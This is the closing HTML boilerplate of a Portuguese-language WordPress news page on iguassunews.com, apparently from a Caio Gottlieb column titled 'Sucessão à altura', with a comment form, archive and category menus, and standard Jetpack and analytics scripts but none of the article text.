data-name='like-post-frame-12891280-31312-60369408cf9a0'><h3 class="sd-title">Curtir isso:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Curtir</span></span> <span class="loading">Carregando...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "Coluna Caio Gottlieb: SUCESSÃO À ALTURA"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/coluna-caio-gottlieb-sucessao-a-altura/#respond" style="display:none;">Cancelar resposta</a></small></h3><form action="http://iguassunews.com/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='31312' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="ab7ba26fdc" /></p><input type="hidden" id="ak_js" name="ak_js" value="21"/><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea></form>	</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://iguassunews.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div><div id="archives-2" class="sb-widget clearfix widget_archive"><h4 class="widget-title"><span>Arquivos</span></h4>		<label class="screen-reader-text" for="archives-dropdown-2">Arquivos</label>
		<select id="archives-dropdown-2" name="archive-dropdown">
			
			<option value="">Selecionar o mês</option>
				<option value='http://iguassunews.com/2021/02/'> fevereiro 2021 </option>
	<option value='http://iguassunews.com/2021/01/'> janeiro 2021 </option>
	<option value='http://iguassunews.com/2020/12/'> dezembro 2020 </option>
	<option value='http://iguassunews.com/2020/11/'> novembro 2020 </option>
	<option value='http://iguassunews.com/2020/10/'> outubro 2020 </option>
	<option value='http://iguassunews.com/2020/09/'> setembro 2020 </option>
	<option value='http://iguassunews.com/2020/08/'> agosto 2020 </option>
	<option value='http://iguassunews.com/2020/07/'> julho 2020 </option>
	<option value='http://iguassunews.com/2020/04/'> abril 2020 </option>
	<option value='http://iguassunews.com/2020/03/'> março 2020 </option>
	<option value='http://iguassunews.com/2019/12/'> dezembro 2019 </option>
	<option value='http://iguassunews.com/2019/11/'> novembro 2019 </option>
	<option value='http://iguassunews.com/2019/10/'> outubro 2019 </option>
	<option value='http://iguassunews.com/2019/09/'> setembro 2019 </option>
	<option value='http://iguassunews.com/2019/08/'> agosto 2019 </option>
	<option value='http://iguassunews.com/2019/07/'> julho 2019 </option>
	<option value='http://iguassunews.com/2019/06/'> junho 2019 </option>
	<option value='http://iguassunews.com/2019/05/'> maio 2019 </option>
	<option value='http://iguassunews.com/2019/04/'> abril 2019 </option>
	<option value='http://iguassunews.com/2019/03/'> março 2019 </option>
	<option value='http://iguassunews.com/2019/02/'> fevereiro 2019 </option>
	<option value='http://iguassunews.com/2019/01/'> janeiro 2019 </option>
	<option value='http://iguassunews.com/2018/12/'> dezembro 2018 </option>
	<option value='http://iguassunews.com/2018/11/'> novembro 2018 </option>
	<option value='http://iguassunews.com/2018/10/'> outubro 2018 </option>
	<option value='http://iguassunews.com/2018/09/'> setembro 2018 </option>
	<option value='http://iguassunews.com/2018/08/'> agosto 2018 </option>
	<option value='http://iguassunews.com/2018/07/'> julho 2018 </option>
	<option value='http://iguassunews.com/2018/06/'> junho 2018 </option>
	<option value='http://iguassunews.com/2018/05/'> maio 2018 </option>
	<option value='http://iguassunews.com/2018/04/'> abril 2018 </option>
	<option value='http://iguassunews.com/2018/03/'> março 2018 </option>
	<option value='http://iguassunews.com/2018/02/'> fevereiro 2018 </option>
	<option value='http://iguassunews.com/2018/01/'> janeiro 2018 </option>
	<option value='http://iguassunews.com/2017/12/'> dezembro 2017 </option>
	<option value='http://iguassunews.com/2017/11/'> novembro 2017 </option>
	<option value='http://iguassunews.com/2017/10/'> outubro 2017 </option>
	<option value='http://iguassunews.com/2017/09/'> setembro 2017 </option>
	<option value='http://iguassunews.com/2017/08/'> agosto 2017 </option>

		</select>

<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "archives-dropdown-2" );
	function onSelectChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {
			document.location.href = this.options[ this.selectedIndex ].value;
		}
	}
	dropdown.onchange = onSelectChange;
})();
/* ]]> */
</script>
			</div><div id="categories-2" class="sb-widget clearfix widget_categories"><h4 class="widget-title"><span>Categorias</span></h4><form action="http://iguassunews.com" method="get"><label class="screen-reader-text" for="cat">Categorias</label><select  name='cat' id='cat' class='postform' >
	<option value='-1'>Selecionar categoria</option>
	<option class="level-0" value="7">Argentina</option>
	<option class="level-0" value="4">Brasil</option>
	<option class="level-0" value="9">Colunas</option>
	<option class="level-1" value="19">&nbsp;&nbsp;&nbsp;Blogsfera News</option>
	<option class="level-1" value="839">&nbsp;&nbsp;&nbsp;Caio Gottlieb</option>
	<option class="level-1" value="17">&nbsp;&nbsp;&nbsp;É Direito</option>
	<option class="level-1" value="725">&nbsp;&nbsp;&nbsp;Espaço Cristão</option>
	<option class="level-1" value="10">&nbsp;&nbsp;&nbsp;Nossa Voz</option>
	<option class="level-0" value="312">Economia</option>
	<option class="level-0" value="702">Espaço Cristão</option>
	<option class="level-0" value="866">Esporte</option>
	<option class="level-0" value="1">Extra</option>
	<option class="level-0" value="6">Foz do Iguaçu</option>
	<option class="level-0" value="864">Infraestrutura</option>
	<option class="level-0" value="14">Internacional</option>
	<option class="level-0" value="12">Latinoamerica</option>
	<option class="level-0" value="858">Meio Ambiente</option>
	<option class="level-0" value="868">Mercosul</option>
	<option class="level-0" value="865">Pandemia</option>
	<option class="level-0" value="8">Paraguay</option>
	<option class="level-0" value="5">Paraná</option>
	<option class="level-0" value="308">Política</option>
	<option class="level-0" value="860">Responsabilidade Social</option>
	<option class="level-0" value="863">Saúde</option>
	<option class="level-0" value="856">Tecnologia</option>
	<option class="level-0" value="859">Terceiro Setor</option>
	<option class="level-0" value="370">Tríplice Fronteira</option>
	<option class="level-0" value="857">Turismo</option>
	<option class="level-0" value="703">Última Hora</option>
</select>
</form>
<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "cat" );
	function onCatChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) {
			dropdown.parentNode.submit();
		}
	}
	dropdown.onchange = onCatChange;
})();
/* ]]> */
</script>

			</div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2021 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/iguassunews.com\/coluna-caio-gottlieb-sucessao-a-altura\/":31312};
	</script>
				<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.3.1/_inc/build/photon/photon.min.js' id='jetpack-photon-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.6.1/wp-includes/js/comment-reply.min.js' id='comment-reply-js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.3.1/_inc/build/postmessage.min.js' id='postmessage-js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.3.1/_inc/build/jquery.jetpack-resize.min.js' id='jetpack_resize-js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.3.1/_inc/build/likes/queuehandler.min.js' id='jetpack_likes_queuehandler-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.6.1/wp-includes/js/wp-embed.min.js' id='wp-embed-js'></script>
<script type='text/javascript' id='jetpack-carousel-js-extra'>
/* <![CDATA[ */
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"pt","ajaxurl":"http:\/\/iguassunews.com\/wp-admin\/admin-ajax.php","nonce":"132312645e","display_exif":"1","display_comments":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Coment\u00e1rio","post_comment":"Publicar coment\u00e1rio","write_comment":"Escreva um Coment\u00e1rio","loading_comments":"Carregando coment\u00e1rios...","download_original":"Visualizar tamanho original <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Certifique-se de enviar algum texto com o seu coment\u00e1rio.","no_comment_email":"Informe um endere\u00e7o de e-mail para comentar.","no_comment_author":"Forne\u00e7a seu nome para comentar.","comment_post_error":"Desculpe, mas ocorreu um erro ao postar seu coment\u00e1rio. Tente novamente mais tarde.","comment_approved":"Seu coment\u00e1rio foi aprovado.","comment_unapproved":"Seu coment\u00e1rio est\u00e1 aguardando modera\u00e7\u00e3o.","camera":"C\u00e2mera","aperture":"Abertura","shutter_speed":"Velocidade do Obturador","focal_length":"Comprimento Focal","copyright":"Direito autoral","comment_registration":"0","require_name_email":"1","login_url":"http:\/\/iguassunews.com\/wp-login.php?redirect_to=http%3A%2F%2Figuassunews.com%2Fcoluna-caio-gottlieb-sucessao-a-altura%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">E-mail (obrigat\u00f3rio)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Nome (obrigat\u00f3rio)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Site<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.3.1/_inc/build/carousel/jetpack-carousel.min.js' id='jetpack-carousel-js'></script>
<script async="async" type='text/javascript' src='http://iguassunews.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.8' id='akismet-form-js'></script>
<script type='text/javascript' id='sharing-js-js-extra'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.3.1/_inc/build/sharedaddy/sharing.min.js' id='sharing-js-js'></script>
<script type='text/javascript' id='sharing-js-js-after'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-telegram', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtelegram', 'menubar=1,resizable=1,width=450,height=450' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-skype', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomskype', 'menubar=1,resizable=1,width=305,height=665' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-linkedin', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' );
				return false;
			});
</script>
	<iframe src='https://widgets.wp.com/likes/master.html?ver=202108#ver=202108&amp;lang=pt-br' scrolling='no' id='likes-master' name='likes-master' style='display:none;'></iframe>
	<div id='likes-other-gravatars'><div class="likes-text"><span>%d</span> blogueiros gostam disto:</div><ul class="wpl-avatars sd-like-gravatars"></ul></div>
	<script src='https://stats.wp.com/e-202108.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:9.3.1',blog:'12891280',post:'31312',tz:'-3',srv:'iguassunews.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '31312' ]);
</script>
</body>
</html>